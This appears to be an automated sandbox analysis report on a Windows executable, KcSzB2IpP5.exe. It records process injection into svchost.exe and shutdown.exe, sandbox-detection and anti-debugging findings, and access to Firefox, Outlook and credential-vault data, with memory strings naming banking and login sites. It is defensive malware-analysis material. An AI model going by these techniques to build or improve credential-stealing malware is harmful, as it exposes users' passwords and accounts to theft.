Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004C16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004C16C3

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004D51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_004D51CD

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004EA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_004EA67C

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004D648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_004D648E

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004642A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_004642A2

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

File created: C:\Users\user\AppData\Local\Temp\aut5F50.tmp

Jump to behavior

Source: KcSzB2IpP5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: shutdown.exe, 00000004.00000003.1678019284.00000000026C8000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1678019284.00000000026A6000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3781063208.00000000026D2000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3781063208.00000000026C8000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3781063208.00000000026F7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: KcSzB2IpP5.exe	Virustotal: Detection: 66%
Source: KcSzB2IpP5.exe	ReversingLabs: Detection: 81%

Source: unknown	Process created: C:\Users\user\Desktop\KcSzB2IpP5.exe "C:\Users\user\Desktop\KcSzB2IpP5.exe"
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KcSzB2IpP5.exe"
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
Source: C:\Windows\SysWOW64\shutdown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KcSzB2IpP5.exe"	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\shutdown.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\shutdown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: KcSzB2IpP5.exe

Static file information: File size 1262080 > 1048576

Source: KcSzB2IpP5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KcSzB2IpP5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KcSzB2IpP5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KcSzB2IpP5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KcSzB2IpP5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KcSzB2IpP5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: KcSzB2IpP5.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: krQctklhjIp.exe, 00000003.00000002.3777063791.000000000029E000.00000002.00000001.01000000.00000004.sdmp, krQctklhjIp.exe, 00000006.00000000.1558533328.000000000029E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: KcSzB2IpP5.exe, 00000000.00000003.1329934846.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, KcSzB2IpP5.exe, 00000000.00000003.1330634006.0000000003950000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1384032582.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1386344161.0000000003000000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3783411551.0000000002AD0000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1490351264.0000000002929000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1481873180.0000000002774000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3783411551.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: shutdown.pdbGCTL source: svchost.exe, 00000002.00000002.1481867263.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450655610.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782371434.0000000001038000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: KcSzB2IpP5.exe, 00000000.00000003.1329934846.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, KcSzB2IpP5.exe, 00000000.00000003.1330634006.0000000003950000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1384032582.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1386344161.0000000003000000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 00000004.00000002.3783411551.0000000002AD0000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1490351264.0000000002929000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1481873180.0000000002774000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3783411551.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: shutdown.pdb source: svchost.exe, 00000002.00000002.1481867263.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450655610.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782371434.0000000001038000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: shutdown.exe, 00000004.00000002.3781063208.000000000263D000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3784032812.00000000030FC000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.000000000308C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1787540796.000000000110C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: shutdown.exe, 00000004.00000002.3781063208.000000000263D000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3784032812.00000000030FC000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.000000000308C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1787540796.000000000110C000.00000004.80000000.00040000.00000000.sdmp

Source: KcSzB2IpP5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KcSzB2IpP5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KcSzB2IpP5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KcSzB2IpP5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KcSzB2IpP5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004642DE

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00480A76 push ecx; ret	0_2_00480A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00419050 push esp; retf	2_2_00419056
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417976 pushad ; retf F3C5h	2_2_004179C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414263 push ebp; retf	2_2_0041444B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040739C push ds; iretd	2_2_004073A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414412 push ebp; retf	2_2_0041444B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004034F0 push eax; ret	2_2_004034F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D532 push 00000016h; ret	2_2_0040D543
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AD3D push esp; ret	2_2_0040AD53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401E68 push ds; retf	2_2_00401E6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416693 push ds; retf	2_2_004166BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004166B2 push ds; retf	2_2_004166BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017CE push ds; ret	2_2_004017E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401FB8 push ds; ret	2_2_00401FD6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx	2_2_032309B6
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B009AD push ecx; mov dword ptr [esp], ecx	4_2_02B009B6
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02420370 pushfd ; iretd	4_2_0242045C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0242045D pushfd ; iretd	4_2_0242045C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02414483 pushad ; retf F3C5h	4_2_024144D5
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_024131A0 push ds; retf	4_2_024131CC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_024131BF push ds; retf	4_2_024131CC
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02415B5D push esp; retf	4_2_02415B63
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0240784A push esp; ret	4_2_02407860
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0241B87D push F3E5F1E9h; retf	4_2_0241B8B7
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0241D99B push ebp; iretd	4_2_0241D99C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02403EA9 push ds; iretd	4_2_02403EB3
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029D5262 push eax; ret	4_2_029D5264
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029C909B push edx; ret	4_2_029C909C
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029C60C9 push ss; iretd	4_2_029C60DE
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029C5711 push eax; iretd	4_2_029C5715
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_029CB4DF push ebp; retf	4_2_029CB4E0

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0047F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0047F98E
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004F1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_004F1C41

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96617

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	API/Special instruction interceptor: Address: 102733C
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418CD324
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418CD7E4
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418CD944
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418CD504
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418CD544
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418CD1E4
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418D0154
Source: C:\Windows\SysWOW64\shutdown.exe	API/Special instruction interceptor: Address: 7FF8418CDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\shutdown.exe	Window / User API: threadDelayed 3186			Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Window / User API: threadDelayed 6787			Jump to behavior

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	API coverage: 3.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\shutdown.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\shutdown.exe TID: 7244	Thread sleep count: 3186 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe TID: 7244	Thread sleep time: -6372000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe TID: 7244	Thread sleep count: 6787 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe TID: 7244	Thread sleep time: -13574000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe TID: 3692	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe TID: 3692	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe TID: 3692	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe TID: 3692	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe TID: 3692	Thread sleep time: -52500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\shutdown.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\shutdown.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004CDBBE
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0049C2A2 FindFirstFileExW,	0_2_0049C2A2
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D68EE FindFirstFileW,FindClose,	0_2_004D68EE
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_004D698F
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004CD076
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004CD3A9
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004D9642
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004D979D
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_004D9B2B
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_004D5C97
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0241C4B0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0241C4B0

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004642DE

Source: 8430F899.4.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: krQctklhjIp.exe, 00000006.00000002.3782285244.000000000107F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: 8430F899.4.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696501413t
Source: 8430F899.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ive userers - NDCDYNVMware20,11696501413z
Source: 8430F899.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 8430F899.4.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ansaction PasswordVMware20,11696501413x
Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ctiveuserers.comVMware20,11696501413}
Source: 8430F899.4.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20
Source: 8430F899.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: 8430F899.4.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EU WestVMware20,11696501413n
Source: 8430F899.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413#
Source: 8430F899.4.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: 8430F899.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: firefox.exe, 00000008.00000002.1789127757.000002318103E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: shutdown.exe, 00000004.00000002.3781063208.000000000263D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: 8430F899.4.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: 8430F899.4.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 8430F899.4.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 8430F899.4.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 8430F899.4.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: 8430F899.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
